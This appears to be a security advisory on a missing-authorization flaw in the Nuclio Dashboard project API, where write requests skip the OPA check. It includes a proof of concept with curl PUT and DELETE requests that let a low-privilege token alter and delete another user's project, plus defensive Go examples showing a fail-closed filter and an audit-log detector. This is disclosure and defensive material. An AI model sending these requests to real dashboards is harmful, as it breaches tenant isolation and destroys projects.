The vulnerability (CVE pending) is in the Nuclio Dashboard's project management API. The dashboard uses OPA (Open Policy Agent) for authorization, and the read paths correctly populate `MemberIds` in `PermissionOptions` from the authenticated user's session. The write paths (PUT /api/projects/{id} and DELETE /api/projects) construct `PermissionOptions` without setting `MemberIds`. The platform-layer function `FilterProjectsByPermissions` (pkg/platform/abstract/platform.go:652) short-circuits when `MemberIds` is empty and returns all projects without any OPA query. As a result, any authenticated user, including one with no membership in the target project, can modify or delete any project by name.

Deletion cascades to every function, API gateway and function event associated with the project. Kubernetes deployments are affected as well, because projects map to NuclioProject CRDs: a modification changes fields such as DefaultFunctionNodeSelector, and a deletion removes the CRD together with all of its child resources.

The validation functions on the write path (ValidateProjectConfig, ValidateDeleteProjectOptions) check format only and contain no identity or ownership checks. `ValidateDeleteProjectOptions` internally calls `GetProjects` with the same empty `MemberIds`, so it succeeds for any project name and only gives the appearance of a security check. The call chain shows the read path invoking OPA while the write paths bypass it entirely.

The attacker needs only valid low-privilege dashboard credentials; no Kubernetes RBAC permissions are required. Exploitation difficulty is very low: the attacker sends a PUT or DELETE request naming the target project. The proof of concept builds the dashboard from source, runs mock auth and OPA servers, and shows a reader token with no project access first modifying and then deleting a project created by an admin.

The impact is a multi-tenant isolation breach. Integrity (modify any project) and availability (delete any project) are high; confidentiality is low, limited to inferring whether a project exists from the response code.
No patched version exists as of 2026-05-06; workarounds include network restrictions and credential control.
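To make the failure mode concrete, the following is an added Go example, not Nuclio's code: it models the fail-open short-circuit described above beside a fail-closed version, and shows why the write handlers, which pass an empty `PermissionOptions`, can reach any project. The `Project` type, the `opaAllow` stand-in for the OPA query, the `resolveForWrite*` helpers and the sample projects are all constructed for this illustration.

```go
package main

import "fmt"

// Project is a reduced model of a Nuclio project: a name and the member IDs
// allowed to act on it. Constructed for this example, not Nuclio's type.
type Project struct {
	Name      string
	MemberIDs []string
}

// PermissionOptions mirrors the shape the advisory describes: the read paths
// fill MemberIds from the session, the write paths leave it empty.
type PermissionOptions struct {
	MemberIds []string
}

// opaAllow stands in for the OPA query. The stand-in policy is "the caller is a
// member of the project"; the real policy lives in OPA, outside the dashboard.
func opaAllow(p Project, memberIds []string) bool {
	for _, caller := range memberIds {
		for _, member := range p.MemberIDs {
			if caller == member {
				return true
			}
		}
	}
	return false
}

// filterWithOPA is the path both variants take once an identity is present.
func filterWithOPA(projects []Project, opts PermissionOptions) []Project {
	var allowed []Project
	for _, p := range projects {
		if opaAllow(p, opts.MemberIds) {
			allowed = append(allowed, p)
		}
	}
	return allowed
}

// filterVulnerable reproduces the short-circuit: an empty MemberIds is treated
// as "nothing to filter by", so every project comes back and OPA is never asked.
func filterVulnerable(projects []Project, opts PermissionOptions) []Project {
	if len(opts.MemberIds) == 0 {
		return projects // fail-open: this is the bug
	}
	return filterWithOPA(projects, opts)
}

// filterHardened fails closed: a permission check with no caller identity is a
// caller-side programming error and must not grant access to anything.
func filterHardened(projects []Project, opts PermissionOptions) ([]Project, error) {
	if len(opts.MemberIds) == 0 {
		return nil, fmt.Errorf("permission check without caller identity")
	}
	return filterWithOPA(projects, opts), nil
}

// resolveForWriteVulnerable models a write handler looking up its target the
// way the advisory says the write paths do: through the filter, with an empty
// PermissionOptions. Any name that exists resolves.
func resolveForWriteVulnerable(projects []Project, name string) bool {
	for _, p := range filterVulnerable(projects, PermissionOptions{}) {
		if p.Name == name {
			return true
		}
	}
	return false
}

// resolveForWriteHardened carries the caller's identity into the filter, so a
// project resolves only if OPA would allow this caller to see it.
func resolveForWriteHardened(projects []Project, name string, callerIDs []string) bool {
	visible, err := filterHardened(projects, PermissionOptions{MemberIds: callerIDs})
	if err != nil {
		return false
	}
	for _, p := range visible {
		if p.Name == name {
			return true
		}
	}
	return false
}

// sampleProjects is constructed input: victim-project belongs to admin only.
var sampleProjects = []Project{
	{Name: "victim-project", MemberIDs: []string{"admin"}},
	{Name: "shared-project", MemberIDs: []string{"admin", "reader"}},
}

func main() {
	fmt.Println("vulnerable, no identity, victim-project:", resolveForWriteVulnerable(sampleProjects, "victim-project"))
	fmt.Println("hardened,   reader,      victim-project:", resolveForWriteHardened(sampleProjects, "victim-project", []string{"reader"}))
	fmt.Println("hardened,   reader,      shared-project:", resolveForWriteHardened(sampleProjects, "shared-project", []string{"reader"}))
}
```

The design point is that "empty means unfiltered" is only safe when every caller is guaranteed to populate the identity; the write handlers here are not, so the filter should refuse rather than pass everything through.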
DailyCVE Form:
Platform: Nuclio Dashboard
Version: v1.15.26, HEAD
Vulnerability: Missing Authorization
Severity: Critical
date: 2026-06-04
Prediction: 2026-09-30
What Undercode Say:
# Build the dashboard from source
cd /path/to/nuclio-source
mkdir -p /tmp/nuclio-test
GOPROXY="https://goproxy.io,direct" go build -o /tmp/nuclio-test/nuclio-dashboard ./cmd/dashboard/main.go

# Start the mock auth and OPA servers (Python script from the PoC)
python3 mock_server.py &

# Start the dashboard with iguazio auth pointed at the mock verifier
/tmp/nuclio-test/nuclio-dashboard --platform=local --listen-addr=:8070 \
  --auth-config-kind=iguazio \
  --auth-config-iguazio-verification-url="http://127.0.0.1:9998/verify" &

# Unauthorized PUT (exploit): reader-token has no membership in victim-project
curl -X PUT -H "Authorization: reader-token" \
  -H "x-nuclio-namespace: test-ns" \
  -d '{"metadata":{"name":"victim-project"},"spec":{"description":"hacked"}}' \
  http://localhost:8070/api/projects/victim-project
# Returns 204 (successful modification)

# Unauthorized DELETE: the same token removes the project and everything under it
curl -X DELETE -H "Authorization: reader-token" \
  -H "x-nuclio-namespace: test-ns" \
  -d '{"metadata":{"name":"victim-project","namespace":"test-ns"}}' \
  http://localhost:8070/api/projects
# Returns 204 (successful deletion)
Exploit:
An authenticated low-privilege user sends PUT or DELETE requests to the project API with any known project name; no special skill is required. The chain has four steps: authenticate, send a PUT with a modified spec, observe the 204, optionally send a DELETE. OPA is never invoked on either write.
Protection:
Restrict network access to the Dashboard (firewall rules or a Kubernetes NetworkPolicy), keep tight control over who holds dashboard credentials, and enable audit logging for PUT and DELETE requests on the /api/projects paths so that writes by non-members can be spotted. No official patch as of 2026-05-06.
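Audit logging is only useful if something reads the log. The following is an added Go example, not Nuclio's code, of the check a log pipeline can run while no patch exists: replay project writes against an out-of-band membership table and flag every PUT or DELETE whose author is not a member. The JSON record format, its field names and the membership table are assumptions; the sample records are constructed to mirror the PoC requests above.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// AuditEvent is the assumed shape of one access-log record in front of the
// dashboard. Field names are an assumption; map them to what your proxy emits.
type AuditEvent struct {
	Method    string `json:"method"`
	Path      string `json:"path"`
	User      string `json:"user"`
	Namespace string `json:"namespace"`
	Status    int    `json:"status"`
	Body      string `json:"body,omitempty"`
}

// Alert is one project write by a non-member.
type Alert struct {
	User    string
	Method  string
	Project string
	Status  int
}

// projectFromEvent recovers the target project: from the URL for
// PUT /api/projects/{name}, from the JSON body for DELETE /api/projects.
func projectFromEvent(ev AuditEvent) (string, bool) {
	switch ev.Method {
	case "PUT":
		const prefix = "/api/projects/"
		if !strings.HasPrefix(ev.Path, prefix) {
			return "", false
		}
		name := strings.TrimPrefix(ev.Path, prefix)
		if i := strings.IndexAny(name, "/?"); i >= 0 {
			name = name[:i]
		}
		return name, name != ""
	case "DELETE":
		if strings.TrimSuffix(ev.Path, "/") != "/api/projects" {
			return "", false
		}
		var body struct {
			Metadata struct {
				Name string `json:"name"`
			} `json:"metadata"`
		}
		if err := json.Unmarshal([]byte(ev.Body), &body); err != nil {
			return "", false
		}
		return body.Metadata.Name, body.Metadata.Name != ""
	}
	return "", false
}

func isMember(members []string, user string) bool {
	for _, m := range members {
		if m == user {
			return true
		}
	}
	return false
}

// detectUnauthorizedWrites replays records against the membership table and
// returns every project write by a non-member. A project missing from the
// table has no members, so writes to it are flagged too (fail closed).
func detectUnauthorizedWrites(lines []string, members map[string][]string) []Alert {
	var alerts []Alert
	for _, line := range lines {
		var ev AuditEvent
		if err := json.Unmarshal([]byte(line), &ev); err != nil {
			continue // malformed record; a real pipeline would count these
		}
		project, ok := projectFromEvent(ev)
		if !ok || isMember(members[project], ev.User) {
			continue
		}
		alerts = append(alerts, Alert{User: ev.User, Method: ev.Method, Project: project, Status: ev.Status})
	}
	return alerts
}

// Constructed sample records mirroring the PoC: a harmless GET, the two exploit
// requests from reader, an allowed write to a shared project, and an admin delete.
var sampleAuditLines = []string{
	`{"method":"GET","path":"/api/projects","user":"reader","namespace":"test-ns","status":200}`,
	`{"method":"PUT","path":"/api/projects/victim-project","user":"reader","namespace":"test-ns","status":204}`,
	`{"method":"PUT","path":"/api/projects/shared-project","user":"reader","namespace":"test-ns","status":204}`,
	`{"method":"DELETE","path":"/api/projects","user":"reader","namespace":"test-ns","status":204,"body":"{\"metadata\":{\"name\":\"victim-project\",\"namespace\":\"test-ns\"}}"}`,
	`{"method":"DELETE","path":"/api/projects","user":"admin","namespace":"test-ns","status":204,"body":"{\"metadata\":{\"name\":\"victim-project\",\"namespace\":\"test-ns\"}}"}`,
}

// Constructed membership table; in practice this comes from the identity provider.
var sampleMembership = map[string][]string{
	"victim-project": {"admin"},
	"shared-project": {"admin", "reader"},
}

func main() {
	for _, a := range detectUnauthorizedWrites(sampleAuditLines, sampleMembership) {
		fmt.Printf("ALERT %s %s by non-member %s (status %d)\n", a.Method, a.Project, a.User, a.Status)
	}
}
```

The status is carried into the alert because on a vulnerable dashboard these writes return 204; a 403 in the same position is what you expect to see after a fix.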
Impact:
Multi-tenant isolation breach: any authenticated user can modify or delete any project. Integrity (High): the project configuration can be changed, which alters how functions in that project are deployed. Availability (High): deleting a project cascades to all of its functions, API gateways and function events. Confidentiality (Low): response codes leak whether a project exists.
Sources:
Reported By: nvd.nist.gov